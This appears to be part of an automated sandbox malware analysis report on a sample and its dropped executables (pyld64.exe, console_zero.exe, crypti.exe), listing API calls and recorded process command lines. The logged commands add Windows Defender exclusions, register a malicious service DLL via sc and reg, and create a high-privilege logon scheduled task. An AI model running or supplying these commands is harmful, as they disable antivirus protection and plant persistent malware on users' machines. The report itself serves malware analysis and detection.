Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA33AEE70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA33AFA50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3797178 SetUnhandledExceptionFilter,53_2_00007FFDA3797178
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3796F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA3796F94
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3796630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA3796630
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA553D768
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA553E24C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55D57A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA55D57A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55D6224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA55D6224
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71AB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6F8C71AB4
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71C94 SetUnhandledExceptionFilter,59_2_00007FF6F8C71C94
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C786CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6F8C786CC
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71800 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FF6F8C71800
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55D57A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FFDA55D57A0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55D6224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FFDA55D6224
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354D3AC SetUnhandledExceptionFilter,84_2_00007FF6D354D3AC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354D1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF6D354D1CC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D355A8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF6D355A8A8
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354CE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,84_2_00007FF6D354CE30
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94CE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,87_2_00007FF6EA94CE30
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94D3AC SetUnhandledExceptionFilter,87_2_00007FF6EA94D3AC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94D1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,87_2_00007FF6EA94D1CC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA95A8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,87_2_00007FF6EA95A8A8

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x543664\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x543664.dat" /f && sc start x543664
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x543664\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x543664.dat" /f && sc start x543664
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E57820 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetModuleFileNameW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF646E57820
Source: crypti.exe, 0000006C.00000002.3330121598.0000018C10B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPPDA
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E73080 cpuid 3_2_00007FF646E73080
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF646E71010
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E69004
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E70914
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00007FF646E70E18
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,3_2_00007FF646E705B0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E70ECC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoEx,FormatMessageA,3_2_00007FF646E59694
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E70CC0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E68C90
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E709E4
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF646E70A7C
Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,53_2_682864E0
Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,53_2_68287D70
Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,53_2_68286680
Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,53_2_00007FFDA3794B70
Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,59_2_00007FF6F8C7F978
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C871C8
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C7F29C
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,59_2_00007FF6F8C87260
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,59_2_00007FF6F8C6FBA8
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,59_2_00007FF6F8C874A4
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,59_2_00007FF6F8C7F610
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,59_2_00007FF6F8C875FC
Source: C:\Windows\System32\console_zero.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,59_2_00007FF6F8C86D94
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,59_2_00007FF6F8C7F540
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,59_2_00007FF6F8C876B0
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,59_2_00007FF6F8C877F4
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,59_2_00007FF6F8C870F8
Source: C:\Windows\System32\crypti.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,84_2_00007FF6D356869C
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesEx,84_2_00007FF6D3568264
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,84_2_00007FF6D3568334
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,84_2_00007FF6D3571308
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,84_2_00007FF6D35711C4
Source: C:\Windows\System32\crypti.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,84_2_00007FF6D35708A8
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,84_2_00007FF6D3570CDC
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,84_2_00007FF6D3570C0C
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,84_2_00007FF6D3571110
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,84_2_00007FF6D3570FB8
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,84_2_00007FF6D3567FC0
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,84_2_00007FF6D3570D74
Source: C:\Windows\System32\crypti.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,87_2_00007FF6EA96869C
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,87_2_00007FF6EA970C0C
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,87_2_00007FF6EA970CDC
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,87_2_00007FF6EA970FB8
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,87_2_00007FF6EA967FC0
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,87_2_00007FF6EA971110
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,87_2_00007FF6EA970D74
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,87_2_00007FF6EA9711C4
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,87_2_00007FF6EA968334
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,87_2_00007FF6EA971308
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesEx,87_2_00007FF6EA968264
Source: C:\Windows\System32\crypti.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,87_2_00007FF6EA9708A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
